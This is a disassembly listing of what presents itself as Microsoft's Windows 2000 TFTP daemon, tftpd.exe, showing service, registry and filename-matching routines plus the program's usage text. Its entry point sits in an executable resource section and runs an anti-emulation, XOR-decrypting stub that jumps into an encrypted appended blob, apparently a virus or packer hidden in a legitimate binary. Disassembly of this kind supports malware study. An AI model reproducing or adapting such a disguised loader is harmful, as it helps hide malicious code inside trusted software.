lea eax, [ebp+cbData]
mov [ebp+cbData], edi
push eax ; lpcbData
lea eax, [ebp+Type]
push offset byte_1005D58 ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aReadable ; "readable"
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_10038C6
call ds:GetLastError
jmp short loc_10038CF
; ---------------------------------------------------------------------------
loc_10038C6: ; CODE XREF: sub_10037BF+FD�j
cmp [ebp+Type], 1
jnz short loc_10038CF
inc [ebp+var_4]
loc_10038CF: ; CODE XREF: sub_10037BF+105�j
; sub_10037BF+10B�j
lea eax, [ebp+cbData]
mov [ebp+cbData], edi
push eax ; lpcbData
lea eax, [ebp+Type]
push offset byte_1005D90 ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aWritable ; "writable"
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_10038F6
call ds:GetLastError
jmp short loc_10038FF
; ---------------------------------------------------------------------------
loc_10038F6: ; CODE XREF: sub_10037BF+12D�j
cmp [ebp+Type], 1
jnz short loc_10038FF
inc [ebp+var_4]
loc_10038FF: ; CODE XREF: sub_10037BF+135�j
; sub_10037BF+13B�j
push [ebp+hKey] ; hKey
call ds:RegCloseKey ; RegCloseKey
mov eax, [ebp+var_4]
pop esi
pop edi
loc_100390D: ; CODE XREF: sub_10037BF+32�j
pop ebx
leave
retn
sub_10037BF endp
; =============== S U B R O U T I N E =======================================
sub_1003910 proc near ; CODE XREF: sub_1001665+193�p
Dst = byte ptr -1F4h
sub esp, 1F4h
cmp byte ptr dword_1005E07+1, 0
push ebx
push ebp
push esi
push edi
mov ebp, 1F4h
mov ebx, (offset dword_1005E07+1)
jnz short loc_100393D
push ebp ; Count
push offset Source ; "\\tftpdroot\\"
push ebx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_100393D: ; CODE XREF: sub_1003910+1B�j
lea eax, [esp+204h+Dst]
push ebp ; nSize
push eax ; lpDst
push ebx ; lpSrc
call ds:ExpandEnvironmentStringsA ; ExpandEnvironmentStringsA
test eax, eax
jnz short loc_1003952
push 57h
jmp short loc_10039CA
; ---------------------------------------------------------------------------
loc_1003952: ; CODE XREF: sub_1003910+3C�j
mov ecx, eax
lea esi, [esp+204h+Dst]
mov edi, ebx
or edx, 0FFFFFFFFh
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebx
mov ecx, edx
repne scasb
not ecx
dec ecx
cmp byte ptr dword_1005E07[ecx], 2Fh
lea eax, dword_1005E07[ecx]
jnz short loc_1003986
mov byte ptr [eax], 5Ch
loc_1003986: ; CODE XREF: sub_1003910+71�j
cmp byte ptr [eax], 5Ch
jz short loc_10039B7
cmp ecx, ebp
jnb short loc_10039B7
mov edi, offset asc_100155C ; "\\"
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebp, ecx
mov edi, ebx
mov ecx, edx
repne scasb
mov ecx, ebp
dec edi
shr ecx, 2
rep movsd
mov ecx, ebp
and ecx, 3
rep movsb
loc_10039B7: ; CODE XREF: sub_1003910+79�j
; sub_1003910+7D�j
mov edi, ebx
mov ecx, edx
xor eax, eax
push 1
repne scasb
not ecx
dec ecx
mov dword_1005FFC, ecx
loc_10039CA: ; CODE XREF: sub_1003910+40�j
pop eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1F4h
retn
sub_1003910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10039D6 proc near ; CODE XREF: sub_1002F31+148�p
; sub_1002F31+159�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov al, [esi]
test al, al
jz short loc_1003A2E
cmp al, 2Ah
jz short loc_1003A04
cmp al, 3Fh
jz short loc_10039F7
mov ecx, [ebp+arg_4]
cmp al, [ecx]
jnz short loc_1003A25
inc ecx
push ecx
jmp short loc_1003A01
; ---------------------------------------------------------------------------
loc_10039F7: ; CODE XREF: sub_10039D6+14�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jz short loc_1003A25
inc eax
push eax
loc_1003A01: ; CODE XREF: sub_10039D6+1F�j
inc esi
jmp short loc_1003A1B
; ---------------------------------------------------------------------------
loc_1003A04: ; CODE XREF: sub_10039D6+10�j
mov edi, [ebp+arg_4]
lea eax, [esi+1]
push edi
push eax
call sub_10039D6
test eax, eax
jnz short loc_1003A29
cmp [edi], al
jz short loc_1003A25
inc edi
push edi
loc_1003A1B: ; CODE XREF: sub_10039D6+2C�j
push esi
call sub_10039D6
test eax, eax
jnz short loc_1003A29
loc_1003A25: ; CODE XREF: sub_10039D6+1B�j
; sub_10039D6+27�j ...
xor eax, eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A29: ; CODE XREF: sub_10039D6+3D�j
; sub_10039D6+4D�j
push 1
pop eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A2E: ; CODE XREF: sub_10039D6+C�j
mov ecx, [ebp+arg_4]
xor eax, eax
cmp [ecx], al
setz al
loc_1003A38: ; CODE XREF: sub_10039D6+51�j
; sub_10039D6+56�j
pop edi
pop esi
pop ebp
retn 8
sub_10039D6 endp
; [00000006 BYTES: COLLAPSED FUNCTION _chkstk. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NotifyAddrChange. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetIpAddrTable. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001560
push offset loc_1003BF0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push 1
call ds:__set_app_type ; __set_app_type
add esp, 4
mov dword_10062D0, 0FFFFFFFFh
mov dword_10062D4, 0FFFFFFFFh
call ds:__p__fmode ; __p__fmode
mov ecx, dword_100600C
mov [eax], ecx
call ds:__p__commode ; __p__commode
mov edx, dword_1006008
mov [eax], edx
mov eax, ds:_adjust_fdiv
mov ecx, [eax]
mov dword_10062D8, ecx
call nullsub_2
mov eax, dword_1005DC4
test eax, eax
jnz short loc_1003AE1
push offset loc_1003BD0
call ds:__setusermatherr ; __setusermatherr
add esp, 4
loc_1003AE1: ; CODE XREF: .text:01003AD1�j
call sub_1003BB0
push offset dword_100500C
push offset dword_1005008
call _initterm ; _initterm
add esp, 8
mov edx, dword_1006004
mov [ebp-28h], edx
lea eax, [ebp-28h]
push eax
mov ecx, dword_1006000
push ecx
lea edx, [ebp-20h]
push edx
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
push ecx
call ds:__getmainargs ; __getmainargs
add esp, 14h
push offset dword_1005004
push offset dword_1005000
call _initterm ; _initterm
add esp, 8
call ds:__p___initenv ; __p___initenv
mov edx, [ebp-20h]
mov [eax], edx
mov eax, [ebp-20h]
push eax
mov ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-1Ch]
push edx
call sub_1001570
; ---------------------------------------------------------------------------
add esp, 0Ch
mov [ebp-24h], eax
push eax
call ds:exit ; exit
; ---------------------------------------------------------------------------
jmp short loc_1003B80
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call _XcptFilter ; _XcptFilter
add esp, 8
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov edx, [ebp-30h]
push edx
call ds:_exit ; _exit
; ---------------------------------------------------------------------------
loc_1003B80: ; CODE XREF: .text:01003B5C�j
add esp, 4
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_1003BB0 proc near ; CODE XREF: .text:loc_1003AE1�p
push 30000h ; Mask
push 10000h ; NewValue
call _controlfp ; _controlfp
add esp, 8
retn
sub_1003BB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_1003BD0: ; DATA XREF: .text:01003AD3�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_1003BF0: ; DATA XREF: .text:01003A5A�o
jmp ds:_except_handler3
; [00000006 BYTES: COLLAPSED FUNCTION _controlfp. PRESS KEYPAD "+" TO EXPAND]
dd 3D7Ch, 2 dup(0FFFFFFFFh), 3E60h, 10F4h, 3CA4h, 2 dup(0FFFFFFFFh)
dd 4012h, 101Ch, 3C88h, 2 dup(0FFFFFFFFh), 40A2h, 1000h
dd 3DCCh, 2 dup(0FFFFFFFFh), 4172h, 1144h, 3DC0h, 2 dup(0FFFFFFFFh)
dd 41A2h, 1138h, 3D04h, 2 dup(0FFFFFFFFh), 42F6h, 107Ch
dd 5 dup(0)
dd 4092h, 4020h, 407Eh, 4070h, 4052h, 403Eh, 0
dd 3E6Ch, 3FF6h, 3FE6h, 3FCEh, 3FBEh, 3FB2h, 3FA2h, 3E7Ah
dd 3E8Ah, 3EA0h, 3EB0h, 3ECCh, 3EDAh, 3EF2h, 3EFEh, 3F0Ch
dd 3F24h, 3F3Ch, 3F56h, 3F62h, 3F70h, 3F78h, 3F92h, 0
dd 4282h, 4272h, 428Eh, 4230h, 4226h, 421Eh, 4214h, 420Ah
dd 4200h, 41F8h, 41F0h, 41E6h, 41DCh, 41D2h, 41CAh, 41C2h
dd 4302h, 42E2h, 42D0h, 42C2h, 42B2h, 42A2h, 41B8h, 4262h
dd 4254h, 424Ch, 423Ah, 4242h, 41B0h, 0
dd 3E52h, 8000006Fh, 80000073h, 3E08h, 80000009h, 3E1Ah
dd 8000000Fh, 3E34h, 8000000Ah, 3E42h, 80000003h, 8000000Ch
dd 80000002h, 80000037h, 80000017h, 80000014h, 0
dd 417Ch, 4190h, 0
dd 4126h, 4168h, 415Eh, 4154h, 4142h, 4130h, 411Ah, 4112h
dd 410Ah, 40F4h, 40EAh, 40D4h, 40B0h, 40C2h, 0
dd 53570019h, 65764541h, 6553746Eh, 7463656Ch, 1B0000h
aWsagetoverlapp db 'WSAGetOverlappedResult',0
align 4
a2 db '2',0
aWsarecvfrom db 'WSARecvFrom',0
dw 0Fh
aWsacloseevent db 'WSACloseEvent',0
db '=',0
aWsasocketa db 'WSASocketA',0
align 10h
aWs2_32_dll db 'WS2_32.dll',0
align 4
aM db 'Œ',0
aExitprocess db 'ExitProcess',0
dw 12Dh
aGetlasterror db 'GetLastError',0
align 2
dw 2FDh
aWaitforsingleo db 'WaitForSingleObject',0
a4 db '4',0
aCreateeventa db 'CreateEventA',0
align 10h
db 0C5h ; Å
db 1, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
dd 654801B6h, 72437061h, 65746165h, 1DE0000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
dw 1BAh
aHeapfree db 'HeapFree',0
align 2
dw 1Eh
aClosehandle db 'CloseHandle',0
aO db 'o',0
aEntercriticals db 'EnterCriticalSection',0
align 4
retf
; ---------------------------------------------------------------------------
db 1, 49h, 6Eh
aTerlockedincre db 'terlockedIncrement',0
align 4
db 0FBh ; û
db 2, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1B4h
aHeapalloc db 'HeapAlloc',0
dw 252h
aResetevent db 'ResetEvent',0
align 10h
retn
; ---------------------------------------------------------------------------
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0D8h ; Ø
db 2, 54h, 72h
aYentercritical db 'yEnterCriticalSection',0
dw 2C5h
aSuspendthread db 'SuspendThread',0
dw 254h
aResumethread db 'ResumeThread',0
db 0, 90h, 2
aSetevent db 'SetEvent',0
align 2
dw 29Ch
aSetlasterror db 'SetLastError',0
align 2
aZ db 'Z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 12Fh
aGetlocaltime db 'GetLocalTime',0
align 2
aP db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
aKernel32_dll db 'KERNEL32.dll',0
align 10h
db 0E5h ; å
db 1, 53h, 74h
aArtservicectrl db 'artServiceCtrlDispatcherA',0
dw 1DFh
aSetservicestat db 'SetServiceStatus',0
align 2
dw 1B9h
aRegisterservic db 'RegisterServiceCtrlHandlerA',0
db 84h ; „
db 1, 52h, 65h
aGclosekey db 'gCloseKey',0
dw 1A7h
aRegqueryvaluee db 'RegQueryValueExA',0
align 2
dw 19Dh
aRegopenkeyexa db 'RegOpenKeyExA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 10h
db 50h ; P
db 2, 52h, 74h
aLregisterwait db 'lRegisterWait',0
dw 184h
aRtlcreatetimer db 'RtlCreateTimer',0
align 4
db 85h ; …
db 1, 52h, 74h
aLcreatetimerqu db 'lCreateTimerQueue',0
dw 42Eh
a_chkstk db '_chkstk',0
db 0A1h ; ¡
db 1, 52h, 74h
aLderegisterwai db 'lDeregisterWaitEx',0
dw 433h
a_itoa db '_itoa',0
dw 450h
aAtoi db 'atoi',0
align 2
dw 43Dh
a_stricmp db '_stricmp',0
align 2
dw 46Dh
aMemmove db 'memmove',0
dd 7452019Dh, 6C65446Ch, 54657465h, 72656D69h, 2990000h
dd 556C7452h, 74616470h, 6D695465h, 7265h, 6F740486h, 65776F6Ch
dd 45F0072h, 70757369h, 726570h, 7473047Dh, 70636E72h
dd 746E0079h, 2E6C6C64h, 6C6C64h, 6F4E004Fh, 79666974h
dd 72646441h, 6E616843h, 6567h, 65470022h, 41704974h, 54726464h
dd 656C6261h, 70690000h, 61706C68h, 642E6970h, 6C6Ch, 78650246h
dd 7469h, 7270029Bh, 66746E69h, 2430000h, 6D697463h, 2540065h
dd 65706F66h, 17F006Eh, 646B6D5Fh, 7269h, 655F00C5h, 6F6E7272h
dd 0AA0000h, 6468635Fh, 7269h, 697402CDh, 656Dh, 7266025Bh
dd 6565h, 63660249h, 65736F6Ch, 2A40000h, 6C616572h, 636F6Ch
dd 616D028Eh, 636F6C6Ch, 1950000h, 6165725Fh, 0B00064h
dd 6F6C635Fh, 6573h, 6C5F0141h, 6B656573h, 1840000h, 65706F5Fh
dd 214006Eh, 6972775Fh, 6574h, 655F00D0h, 746978h, 585F0048h
dd 46747063h, 65746C69h, 630072h, 5F705F5Fh, 6E695F5Fh
dd 6E657469h, 580076h, 65675F5Fh, 69616D74h, 6772616Eh
dd 10C0073h, 696E695Fh, 72657474h, 82006Dh, 65735F5Fh
dd 65737574h, 74616D72h, 72726568h, 9B0000h, 6A64615Fh
dd 5F747375h, 76696466h, 690000h, 5F705F5Fh, 6D6F635Fh
dd 65646F6Dh, 6E0000h, 5F705F5Fh, 6F6D665Fh, 6564h, 5F5F0080h
dd 5F746573h, 5F707061h, 65707974h, 0C70000h, 6378655Fh
dd 5F747065h, 646E6168h, 3372656Ch, 534D0000h, 54524356h
dd 6C6C642Eh, 0B40000h, 6E6F635Fh, 6C6F7274h, 7066h, 3Ch dup(0)
_text ends
; Section 2. (virtual address 00005000)
; Virtual size : 000012DC ( 4828.)
; Section size in file : 00000E00 ( 3584.)
; Offset to raw data for section: 00003A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 1005000h
dword_1005000 dd 0 dword_1005004 dd 0 dword_1005008 dd 0 dword_100500C dd 0 ; char Format[]
Format db ' ================================================================'
; DATA XREF: sub_1001570+4D�o
db '======== ',0Ah
db 'Abstract: '
db ' ',0Ah
db ' This implements an RFC 783 tftp daemon. '
db ' ',0Ah
db ' It listens on port 69 for requests '
db ' ',0Ah
db ' and spawns a thread to process each request. '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'TFTPD USAGE and Installation: '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' md d:/tftpd (the StartDirec'
db 'tory). ',0Ah
db ' copy //MohsinA_p90/test/tftpd.exe . '
db ' ',0Ah
db ' sc create tftpd binPath= d:/tftpd/tftpd.exe (give full path'
db '). ',0Ah
db ' sc query tftpd (check if insta'
db 'lled). ',0Ah
db ' '
db ' ',0Ah
db 'Start: '
db ' ',0Ah
db ' sc start tftpd -f (creates a log '
db 'file). ',0Ah
db 'or sc start tftpd '
db ' ',0Ah
db 'or net start tftpd '
db ' ',0Ah
db 'or sc start tftpd [-dStartDirectory] [-e] [-f] '
db ' ',0Ah
db ' Options: -e use event log. '
db ' ',0Ah
db ' -f log to file. '
db ' ',0Ah
db ' -dStartDirectory '
db ' ',0Ah
db 'Info: '
db ' ',0Ah
db ' sc interrogate tftpd (logs will be updated). '
db ' ',0Ah
db ' sc query tftpd Check whether running. '
db ' ',0Ah
db 'Stop: '
db ' ',0Ah
db ' sc stop tftpd '
db ' ',0Ah
db ' net stop tftpd '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'Variables that control what files can be read/written and by whom'
db ': ',0Ah
db ' StartDirectory - only files there will be accessible. '
db ' ',0Ah
db ' LogFile is created here. '
db ' ',0Ah
db ' ValidClients - Clients matching this ip address can read files'
db '. ',0Ah
db ' eg. you can set it to "157.55.8?.*" '
db ' ',0Ah
db ' ValidMasters - clients matching this can write and read file'
db 's. ',0Ah
db ' eg. you can set it to "" and no one can write'
db '. ',0Ah
db ' ValidReadFiles - only matching files will be served out, eg. "'
db 'r*.t?t"',0Ah
db ' ValidWriteFiles- only matching files will be accepted, eg. "w'
db '*.txt" ',0Ah
db ' '
db ' ',0Ah
db 'Client: '
db ' ',0Ah
db ' tftp [-i] servername {get|put} src_file dest_file '
db ' ',0Ah
db ' -i from binary mode, else ascii mode is used. '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' ================================================================'
db '======== ',0Ah,0
align 8
; char ServiceName[]
ServiceName db 'Tftpd',0 ; DATA XREF: sub_1001665+B�o
; .data:ServiceStartTable�o
align 10h
; SERVICE_TABLE_ENTRYA ServiceStartTable
ServiceStartTable SERVICE_TABLE_ENTRYA <offset ServiceName, offset sub_1001665>
; DATA XREF: sub_1001570:loc_1001646�o
; "Tftpd"
align 10h
off_1005CC0 dd offset aErrorUndefined ; DATA XREF: sub_100230A+73�r
; "Error undefined"
dd offset aFileNotFound ; "File not found"
dd offset aAccessViolatio ; "Access violation"
dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
dd offset aUnknownTransfe ; "Unknown transfer ID"
dd offset aFileAlreadyExi ; "File already exists"
dd offset aNoSuchUser ; "No such user"
dd offset aOptionNegotiat ; "Option negotiation failure"
align 8
; BYTE Data
Data db 2Ah ; DATA XREF: sub_1002F31+143�o
; sub_10037BF+87�o
align 4
dd 0Dh dup(0)
; BYTE byte_1005D20
byte_1005D20 db 2Ah ; DATA XREF: sub_1002F31+154�o
; sub_100333A+163�o ...
align 4
dd 0Dh dup(0)
; BYTE byte_1005D58
byte_1005D58 db 2Ah ; DATA XREF: sub_1002F31+165�o
; sub_10037BF+EA�o
align 4
dd 0Dh dup(0)
; BYTE byte_1005D90
byte_1005D90 db 2Ah ; DATA XREF: sub_100333A+178�o
; sub_10037BF+11A�o
align 4
dd 0Ch dup(0)
dword_1005DC4 dd 1 align 10h
; FILE *File
File dd 0 ; DATA XREF: sub_1001665+1E5�w
; sub_1001E73:loc_1001F36�r ...
dword_1005DD4 dd 0 dword_1005DD8 dd 0 ; sub_1001665:loc_100182E�r ...
; HANDLE hHandle
hHandle dd 0 ; DATA XREF: sub_1001665+84�w
; sub_1001665+8B�r ...
; HANDLE hObject
hObject dd 0 ; DATA XREF: sub_1001665+91�w
; sub_1001E73:loc_1001F0C�r ...
align 8
; volatile LONG Addend
Addend dd 0 ; DATA XREF: sub_1001A91+26E�o
; sub_1001A91+2B3�o
; HANDLE hHeap
hHeap dd 0 ; DATA XREF: sub_10019F0+29�w
; sub_1001A1F+52�r ...
dword_1005DF0 dd 0 ; sub_1001A1F+5E�w ...
dword_1005DF4 dd 0 ; sub_1001A91+59�w ...
dword_1005DF8 dd 0 ; sub_10018DB+EF�r
dword_1005DFC dd 0 ; HANDLE Handle
Handle dd ? ; DATA XREF: sub_10018DB+F4�o
; sub_1002219+D5�o
db 3 dup(?)
dword_1005E07 dd ? ; sub_1003910+6B�r ...
align 4
dd 7Ch dup(?)
dword_1005FFC dd ? dword_1006000 dd ? dword_1006004 dd ? dword_1006008 dd ? dword_100600C dd ? dd 4 dup(?)
; struct _RTL_CRITICAL_SECTION stru_1006020
stru_1006020 _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10018DB+14�o
; .text:01001D78�o ...
; void *Memory
Memory dd ? ; DATA XREF: sub_10018DB+2A�o
; sub_10018DB+34�w ...
dword_100603C dd ? ; HANDLE hThread
hThread dd ? ; DATA XREF: HandlerProc:loc_1001E1D�r
; HandlerProc:loc_1001E35�r
; SERVICE_STATUS_HANDLE hServiceStatus
hServiceStatus dd ? ; DATA XREF: sub_1001665+52�w
; sub_1001665+DB�r ...
dword_1006048 dd 6 dup(?) ; struct _RTL_CRITICAL_SECTION stru_1006060
stru_1006060 _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10019F0+5�o
; sub_1001A1F+2�o ...
; LPVOID lpMem
lpMem dd ? ; DATA XREF: sub_10019F0�o
; sub_10019F0+F�w ...
dword_100607C dd ? ; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10018DB+D�o
; sub_100287F+1�o ...
dword_1006098 dd ? ; sub_10018DB+25�w ...
dword_100609C dd ? dword_10060A0 dd ? ; sub_10018DB+A2�r ...
dd 7 dup(?)
; time_t Time
Time dq ? ; DATA XREF: sub_1001665+10A�o
; sub_1001665:loc_1001857�o ...
dword_10060C8 dd ? dword_10060CC dd ? dd 0Ch dup(?)
; struct _OVERLAPPED overlapped
overlapped _OVERLAPPED <?> ; DATA XREF: sub_10018DB+E0�o
; sub_1002219:loc_10022E9�o
align 10h
; struct _SERVICE_STATUS ServiceStatus
ServiceStatus _SERVICE_STATUS <?> ; DATA XREF: sub_1001665+10�w
; sub_1001665+63�o ...
align 10h
; struct WSAData stru_1006140
stru_1006140 WSAData <?> ; DATA XREF: sub_1001665+9C�o
dword_10062D0 dd ? dword_10062D4 dd ? dword_10062D8 dd ? align 200h
_data ends
; Section 3. (virtual address 00007000)
; Virtual size : 00007400 ( 29696.)
; Section size in file : 00002A00 ( 10752.)
; Offset to raw data for section: 00004800
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 1007000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 3 dup(0)
dd 10000h, 10h, 80000018h, 3 dup(0)
dd 10000h, 1, 80000030h, 3 dup(0)
dd 10000h, 409h, 48h, 7060h, 374h, 4 dup(0)
dd 340374h, 560000h, 5F0053h, 450056h, 530052h, 4F0049h
dd 5F004Eh, 4E0049h, 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
dd 3Fh, 0
dd 40004h, 1, 3 dup(0)
dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 2B0h, 300001h, 300034h, 300039h, 420034h
dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
dd 65006Dh, 0
aMicrosoftCorpo:
unicode 0, <Microsoft Corporation>,0
aR:
unicode 0, <r%>
dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
unicode 0, <TCP/IP Trivial file transfer daemon.>,0
align 4
a8 db '8',0
dw 0Ch
dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh
dd 0
a5_00_2134_1:
unicode 0, <5.00.2134.1>,0
a4_0:
unicode 0, <4>
dw 0Ah
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h, 690072h
dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh, 66006Fh
dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h, 310038h
dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h, 65h, 660074h
dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
unicode 0, <Microsoft(R) Windows (R) 2000 Operating System>,0
align 4
db '<',0
dw 0Ch
dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h
dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
dd 31h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h
dd 6F0066h, 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 0Bh dup(0)
assume ds:_data
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_100741B
call sub_10074B4
mov ebp, fs:0
add ebp, 8
jmp loc_100746C
start endp
; =============== S U B R O U T I N E =======================================
sub_100741B proc near ; CODE XREF: start+3�p
push dword ptr fs:0
mov fs:0, esp
xor edx, edx
push edx
push 80000000h
push 80000000h
push 80h
push edx
push edx
push 80000000h
push edx
push edx
push edx
push 80h ; hThread
call ds:SuspendThread ; SuspendThread
xor ecx, ecx
push ecx
push 100h
push ecx
push ecx
push 80000000h
push ecx
push 80000000h
push ecx
push ecx ; lpServiceStatus
push ecx ; hServiceStatus
call ds:SetServiceStatus ; SetServiceStatus
loc_100746C: ; CODE XREF: start+16�j
call sub_10074B0
sub esi, 0FFFFFFB0h
push esi
sub ecx, ecx
xor ecx, 243Ch
and edx, 0
or edx, 27h
loc_1007489: ; CODE XREF: sub_100741B+80�j
mov al, [esi]
xor ax, dx
mov [esi], al
inc esi
add dx, 89h
sub ecx, 1
or ecx, ecx
jnz short loc_1007489
pop esi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp esi
sub_100741B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10074B0 proc near ; CODE XREF: sub_100741B:loc_100746C�p
pop esi
push esi
retn
sub_10074B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10074B4 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_10074B4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0B7h, 58h, 39h
dd 0D6D44BC2h, 10F4BE2h, 0A51CB721h, 4940B72Eh, 0C4C843DBh
dd 4D03FF76h, 18D827BEh, 0E9591E42h, 7DF44252h, 88AC378Fh
dd 7DBCB32Ah, 0E960F361h, 0E898E9Ah, 318C2F0Eh, 5797C8BAh
dd 711B5421h, 0B9251389h, 0F2C7AF26h, 64C98611h, 7E84D302h
dd 0ACA41BA8h, 0AE383F55h, 7301E225h, 1210C7EEh, 30308F5Eh
dd 0A16CF3F3h, 57C4A6Ah, 8D53178Eh, 198A4033h, 49B36BEh
dd 0A94F08F7h, 0DF28A393h, 9804F3C3h, 0EAF9E712h, 259C128Ah
dd 194BD5DBh, 0E63758AAh, 0DB835F84h, 0E4DFA002h, 5893C493h
dd 0BA74141Ah, 3AED7BE3h, 15BF4B2Bh, 1C8338BCh, 8A7CFAE0h
dd 0C34CFB57h, 0ADCDCA4Fh, 8A038255h, 0FF917F82h, 82E57671h
dd 0EEF85FE3h, 8A59539Ch, 0A99394E1h, 0CD323478h, 0C1E71859h
dd 0F16304F9h, 3DB42BAEh, 12B72385h, 0EB9D3B8Fh, 0A945FB6Ah
dd 44924461h, 0B15DE3D3h, 1581EB7Ah, 4BF3279Eh, 38A02AA7h
dd 0EF9D19A3h, 0F61CD27Eh, 4CC961D1h, 0ED24EE12h, 1188F29Eh
dd 41C9649Ah, 2DA326F2h, 128619A7h, 5E4B8F74h, 81B93AFCh
dd 160977Bh, 0D84FB02h, 10DCDF13h, 1159BCEAh, 0FCF027EBh
dd 1004FEC2h, 81297DA3h, 1A0C594Ah, 9809986h, 0D2D8F092h
dd 11FD0323h, 446994DAh, 9910C7CAh, 0C9B4AB22h, 0D4ED4258h
dd 8E7CB35Eh, 8DA433F2h, 0FF59B017h, 0FAE81FEFh, 0D535354Fh
dd 38D2C1Eh, 80548B7Bh, 112B5A5h, 25F613E0h, 48A837C4h
dd 0E6E45FD2h, 0C1081532h, 71A7AF70h, 8D0625C1h, 0FD74D83Dh
dd 0FB70C6B5h, 0C843CC55h, 29F1F65Bh, 0DC5529F2h, 0F1BD6046h
